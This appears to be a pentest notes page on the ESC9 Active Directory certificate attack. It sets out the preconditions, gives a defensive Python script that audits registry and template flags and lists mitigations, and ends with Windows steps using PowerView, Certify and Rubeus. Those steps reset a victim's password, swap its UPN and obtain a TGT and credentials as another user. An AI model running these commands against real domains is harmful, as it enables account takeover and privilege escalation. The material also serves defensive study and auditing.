
ESC9

To exploit ESC9, the following conditions must hold: the StrongCertificateBindingEnforcement registry value is not set to 2 (or the UPN mapping flag is still enabled), the template has the CT_FLAG_NO_SECURITY_EXTENSION flag set and specifies client authentication, and the attacker holds GenericWrite over account A, which is then used to compromise account B.
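The preconditions above can be turned into an audit check that says whether a given DC registry state and template combination is ESC9-exposed and which control closes it. The script below is an added example, not code from this page or from Certify/Rubeus. The flag constants and registry value names are the documented Windows ones; the sample registry and template states at the bottom are constructed, and reading the real values (for instance with reg query and Get-ADObject) is assumed to happen outside the script.

```python
"""Defender-side audit of the ESC9 preconditions.

Added example. Inputs are plain Python values; the samples below are
constructed for illustration, not taken from a real environment.
"""
from dataclasses import dataclass

# Documented Windows constants
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000  # msPKI-Enrollment-Flag bit: omit the SID security extension
MAPPING_UPN = 0x4                           # CertificateMappingMethods bit: allow UPN-based mapping
FULL_ENFORCEMENT = 2                        # StrongCertificateBindingEnforcement value for full enforcement
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"       # Client Authentication EKU OID


@dataclass(frozen=True)
class DcRegistry:
    # HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement
    strong_binding: int
    # HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel\CertificateMappingMethods
    mapping_methods: int


@dataclass(frozen=True)
class Template:
    name: str
    enrollment_flag: int  # msPKI-Enrollment-Flag
    ekus: tuple           # OIDs from pKIExtendedKeyUsage


def registry_weak(reg: DcRegistry) -> list:
    """Registry-level reasons weak certificate-to-account mapping is still possible."""
    reasons = []
    if reg.strong_binding != FULL_ENFORCEMENT:
        reasons.append(f"StrongCertificateBindingEnforcement={reg.strong_binding} (not 2)")
    if reg.mapping_methods & MAPPING_UPN:
        reasons.append(f"CertificateMappingMethods=0x{reg.mapping_methods:x} includes UPN bit 0x4")
    return reasons


def template_weak(tpl: Template) -> list:
    """Template-level ESC9 indicators; ESC9 needs both of them on the same template."""
    reasons = []
    if tpl.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        reasons.append(f"{tpl.name}: CT_FLAG_NO_SECURITY_EXTENSION set")
    if EKU_CLIENT_AUTH in tpl.ekus:
        reasons.append(f"{tpl.name}: Client Authentication EKU present")
    return reasons


def assess_esc9(reg: DcRegistry, tpl: Template) -> dict:
    """Combine registry and template state. The third precondition (GenericWrite on
    a victim account) is an ACL question and is not modelled here."""
    reg_reasons = registry_weak(reg)
    tpl_reasons = template_weak(tpl)
    exposed = bool(reg_reasons) and len(tpl_reasons) == 2
    mitigations = []
    if reg_reasons:
        mitigations.append("Set StrongCertificateBindingEnforcement=2 and clear bit 0x4 "
                           "from CertificateMappingMethods on every DC")
    if tpl.enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION:
        mitigations.append(f"Clear 0x80000 from msPKI-Enrollment-Flag on {tpl.name} "
                           "so issued certificates carry the SID extension")
    return {"exposed": exposed, "reasons": reg_reasons + tpl_reasons, "mitigations": mitigations}


def harden_flag(enrollment_flag: int) -> int:
    """Return the msPKI-Enrollment-Flag value with the ESC9 bit cleared."""
    return enrollment_flag & ~CT_FLAG_NO_SECURITY_EXTENSION


if __name__ == "__main__":
    # Constructed sample: compatibility-mode DC and a template with the dangerous flag
    dc = DcRegistry(strong_binding=1, mapping_methods=0x18)
    tpl = Template(name="ExampleUserTemplate", enrollment_flag=0x80020, ekus=(EKU_CLIENT_AUTH,))
    result = assess_esc9(dc, tpl)
    print("exposed:", result["exposed"])
    for r in result["reasons"]:
        print("  reason:", r)
    for m in result["mitigations"]:
        print("  fix:", m)
    print("hardened msPKI-Enrollment-Flag:", hex(harden_flag(tpl.enrollment_flag)))
```

Either mitigation on its own breaks the chain: with StrongCertificateBindingEnforcement at 2 and no UPN mapping bit, the KDC refuses a certificate that lacks the SID extension, and with the template flag cleared the certificate carries the SID of the account that actually enrolled, so changing a victim's userPrincipalName no longer re-points the certificate.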

Windows

user2 Password Reset

PS /home/bobbuilder> Set-DomainUserPassword -Identity user2 -AccountPassword $((ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force)) -Verbose

Change user2 UPN to match user3 UPN

PS /home/bobbuilder> Set-DomainObject user2 -Set @{'userPrincipalName'='user3@minions.com'} -Verbose

Request a certificate using ESC9 and alternative SAN user3

PS /home/bobbuilder> .\Certify.exe request /ca:<ca> /template:<template_name> /altname:user3

Convert certificate to PFX

Retrieving a TGT as user3

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap

Linux